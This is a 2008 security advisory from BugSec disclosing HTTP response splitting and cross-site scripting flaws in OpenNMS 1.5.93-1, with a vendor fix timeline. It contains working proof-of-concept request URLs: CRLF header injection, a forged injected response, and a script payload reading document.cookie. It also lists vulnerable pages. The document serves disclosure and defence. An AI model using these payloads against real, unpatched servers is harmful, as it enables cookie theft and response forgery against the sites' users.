opennms-xss.txt

`OpenNMS Multiple Vulnerabilities  
  
BugSec | Security Advisory  
Moshe Ben-Abu | Security Expert  
  
Advisory URL (PDF):  
http://www.bugsec.com/up_files/OpenNMS_Multiple_Vulnerabilities.pdf  
  
  
- Table of Contents -  
  
OPENNMS MULTIPLE VULNERABILITIES 1  
Vendor 3  
Application Description 3  
OpenNMS HTTP Response Splitting Vulnerability 3  
Vulnerability Information 3  
Vulnerability Details 3  
Proof-of-Concept 4  
OpenNMS Cross-Site Scripting Vulnerabilities 5  
Vulnerability Information 5  
Vulnerability Details 5  
Proof-of-Concept 5  
Security Analysis 6  
Discovery 6  
Disclosure Timeline 6  
About BugSec LTD. 6  
References 6  
  
  
  
Vendor  
OpenNMS Group – http://www.opennms.com  
OpenNMS Project – http://www.opennms.org  
  
Application Description  
“OpenNMS is the world's first enterprise grade network management  
platform developed under the open source model. It  
consists of a community supported open-source project as well as a  
commercial services, training, and support  
organization. - From OpenNMS Project website.  
  
  
OpenNMS HTTP Response Splitting Vulnerability  
Vulnerability Information  
Remotely exploitable: Yes  
Locally exploitable: No  
Affected versions:  
OpenNMS 1.5.93-1  
Other versions may also be affected.  
  
Vulnerability Details  
An input validation problem exists within OpenNMS which allows injecting  
CR (carriage return - %0D or \r) and LF  
(line feed - %0A or \n) characters into the server HTTP response header,  
resulting in a HTTP Response Splitting[1]  
vulnerability.  
This vulnerability is possible because the application fails to validate  
user supplied input, returning it  
un-sanitized within the server HTTP response header back to the client.  
This vulnerability not only gives attackers control of the remaining  
headers and body of the server response, but  
also allows them to create additional responses entirely under their  
control.  
Attacker-supplied HTML or JavaScript code could run in the context of  
the affected site, potentially allowing an  
attacker to steal cookie-based authentication credentials, control how  
the site is rendered to the user, and  
influence or misrepresent how web content is served, cached, or  
interpreted. Other attacks are also possible.  
  
  
  
  
  
  
Proof-of-Concept  
  
Header injection  
http://server/opennms/event/query?%0D%0AInjectedHeader:%20BugSec  
  
Server response  
HTTP/1.1 302 Moved Temporarily  
Date: Thu, 25 Sep 2008 11:30:05 GMT  
Server: Apache/2.2.3  
Location: http://server/opennms/event/list?  
InjectedHeader: BugSec=  
Content-Length: 0  
Connection: close  
Content-Type: text/plain; charset=UTF-8  
  
  
HTTP Response Splitting  
http://server/opennms/event/query?%0D%0AContent-Length:%200%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text  
/html%0D%0AContent-Length:%2036%0D%0A%0D%0A<html><body>BugSec</body></html><!--  
  
Server response  
HTTP/1.1 302 Moved Temporarily  
Date: Thu, 25 Sep 2008 11:35:20 GMT  
Server: Apache/2.2.3  
Location: http://server/opennms/event/list?  
Content-Length: 0  
  
HTTP/1.1 200 OK  
Content-Type: text/html  
Content-Length: 36  
  
<html><body>BugSec</body></html><!--=  
Content-Length: 0  
Connection: close  
Content-Type: text/plain; charset=UTF-8  
  
  
  
OpenNMS Cross-Site Scripting Vulnerabilities  
Vulnerability Information  
Remotely exploitable: Yes  
Locally exploitable: No  
Affected versions:  
• OpenNMS 1.5.93-1  
Other versions may also be affected.  
  
Vulnerability Details  
An input validation problem exists within OpenNMS which allows execution  
of arbitrary client-side code resulting in  
a cross-site scripting vulnerability.  
An attacker may leverage cross-site scripting vulnerability to have  
arbitrary script code executed in the browser of  
an unsuspecting user in the context of the affected site. This may  
facilitate the theft of cookie-based  
authentication credentials as well as other attacks.  
  
Proof-of-Concept  
surveillanceView.htm - viewName  
http://server/opennms/surveillanceView.htm?viewName=<script>alert(document.cookie)</script>  
  
  
Vulnerable pages  
http://server/opennms/asset/modifyAsset  
http://server/opennms/distributedStatusDetails.htm  
http://server/opennms/distributedStatusHistory.htm  
http://server/opennms/event/query  
http://server/opennms/graph/adhoc2.jsp  
http://server/opennms/graph/chooseresource.htm  
http://server/opennms/graph/results.htm  
http://server/opennms/ksc/customView.htm  
http://server/opennms/ksc/formProcMain.htm  
http://server/opennms/notification/browse  
http://server/opennms/notification/list.jsp  
http://server/opennms/outage/list  
http://server/opennms/rtc/category.jsp  
http://server/opennms/statisticsReports/index.htm  
http://server/opennms/statisticsReports/report.htm  
http://server/opennms/surveillanceView.htm  
  
  
Security Analysis  
Discovery  
Moshe Ben-Abu  
BugSec LTD. - Security Consulting Company  
http://www.bugsec.com  
  
  
Disclosure Timeline  
25/09/2008 – BugSec Security Team notifies OpenNMS team about security  
vulnerabilities discovered in OpenNMS,  
sending security advisory draft.  
25/09/2008 – Vendor acknowledgment notification.  
26/09/2008 – OpenNMS 1.5.94 released, fixing HTTP response splitting  
vulnerability but not the cross-site scripting  
vulnerabilities.  
01/10/2008 – OpenNMS 1.5.96 released, fixing cross-site scripting  
vulnerabilities.  
05/10/2008 – Advisory released.  
  
  
About BugSec LTD.  
BugSec Services provide IT & Application Security services for large  
scaled organizations.  
Among services; Penetration Testing, Risk Assessments, Secure Code  
Development and Guidance.  
  
BugSec Solutions develops innovative products and tools which gives  
focused solution to systems data security  
issues, such as Web Application Security, Secure coding and  
Anti-Phishing solution.  
  
  
  
References  
[1] “HTTP Response Splitting, Web Cache Poisoning Attacks, and Related  
Topics” by Amit Klein,  
http://packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf  
`